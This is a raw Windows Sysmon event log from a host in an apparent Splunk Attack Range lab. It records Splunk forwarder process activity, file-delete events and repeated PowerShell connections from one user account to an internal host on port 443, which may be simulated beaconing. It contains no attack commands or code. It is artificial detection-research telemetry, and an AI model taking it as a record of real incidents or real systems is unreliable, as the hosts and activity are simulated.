18:07:44.911{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.911{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.911{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.911{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D70-613A-2690-03000000C801}6056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.911{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D70-613A-2690-03000000C801}6056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.897{B81B27B7-4D70-613A-2690-03000000C801}6056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7CE7FC98533A97E0674F7C296EB7327,SHA256=FAA081409C05EDD1E930670926771B4F0036CA962885DBB1E652F8F586446875,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.878{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CBE4A2E9DC046A75AE481994BEEEDE0,SHA256=2325EA7607395F7653F03D9B1C71AAECE631F62561DC50504B246A7BAD415CA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:08.127{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56533-false10.0.1.12-8000- 23542300x800000000000000035083907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9821FF8A720F87AF4450E3C0C52E893,SHA256=18B42677C46DB4CC16DA842741A61E6F1E019A0A5D347EE5AF6FC0DB6EC3018E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.496{B81B27B7-4D70-613A-2590-03000000C801}21086812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D70-613A-2590-03000000C801}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D70-613A-2590-03000000C801}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.343{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D70-613A-2590-03000000C801}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.329{B81B27B7-4D70-613A-2590-03000000C801}2108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:45.911{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7CE7FC98533A97E0674F7C296EB7327,SHA256=FAA081409C05EDD1E930670926771B4F0036CA962885DBB1E652F8F586446875,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:45.596{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3A8C575A1DF8FDBC38428CDB91CDD0E,SHA256=FEA336ECAD63B8A1DC4BEB3575B61FB1E909A102F6EF4ED82351A962EBEC1CB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:45.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C25EE0B2B1D4CD2C85976425D8270917,SHA256=61747C99A9DFCC79315109DCC9E487D63F159046E2A8012EF4EEBE4625B64B1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:10.458{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56534-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:46.626{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9A3CEACBAC0815705923E2F9BF5F895,SHA256=84B5B0A326441343CE0D8A4A9880EA2E267E79F8681F5D0955EAE2D9D119F97F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:47.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D77CFD178404F3DF513FAE7733AA813,SHA256=D32A14A5EBB4BD5CBC4F5A8F9BB634CBAB9C9737F9D0AB3A330AFBF16A3C5BDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:48.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAF72C821FB9A836156D80DCB6AED5F0,SHA256=86F7DE4293D9F9FC05FDD035EFF7AC3F3F77AD15E545E85EBA47DFC0E47F7CD1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.469{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56536-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.223{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56535-false10.0.1.12-8000- 23542300x800000000000000035083927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:49.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7348E2F8C7AD9F5C43A9B3E9F03A3EA6,SHA256=B5A756576A65A6073CFA6524617DA92197C77717A92C764AEB3EA1A0CFB2ED8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:49.507{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=55F912687E962CE7D22EE0881F8A2DAD,SHA256=A06EBD71B87FF33A7636CEFCB71BDD0F662EAFAAB279E3499A25E3334F8A3ECF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:50.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA0F6AF02E0D4B0EFE47FAD91148DF45,SHA256=68267AA8B01C78F90DD50414290CCB587170DAF47C1A70EC28126EA7AAC8C0EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:51.736{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD6CE0FA487088672178B664BABDFD8A,SHA256=1E08789D99975BFC51C5DE4DF2BF6A87B4BD9EFE6553BD5CE6D03D05D64F6408,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:52.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C73E3033EC934CD914EA7F8B99DEA683,SHA256=CDF875CE55874606ABFCDA57B1EDB7EE40702A39F537BB224361F57AA1D3C4CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:53.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD02DD1D8136B0FE690E2F29B000388F,SHA256=CDFEBDF549B11D759D3651EF3573BD18BE81ECB0977B684E7FAFCDEFEEF7B5E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:53.487{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8470066526D7DDA7258F9B035DDC5620,SHA256=1C8CF19B59C003A721F196264FFB666202B690E85A50BFE1E622F269E12FA3E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:54.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=023139DD72C38993A559566CEB93A102,SHA256=C39011D66920E6C188BFA7E379E3CA0FD7AFFBC091B9495693D6706489520AC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:54.769{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:55.831{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7566B50FA0997A6464B1D6034DACC32,SHA256=CC83E3DCBFA0526BFA9BA51E4F7A057693344D35FC54320D38E13858720BDFCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:19.079{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56538-false10.0.1.12-8000- 354300x800000000000000035083937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:18.481{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56537-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:20.762{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 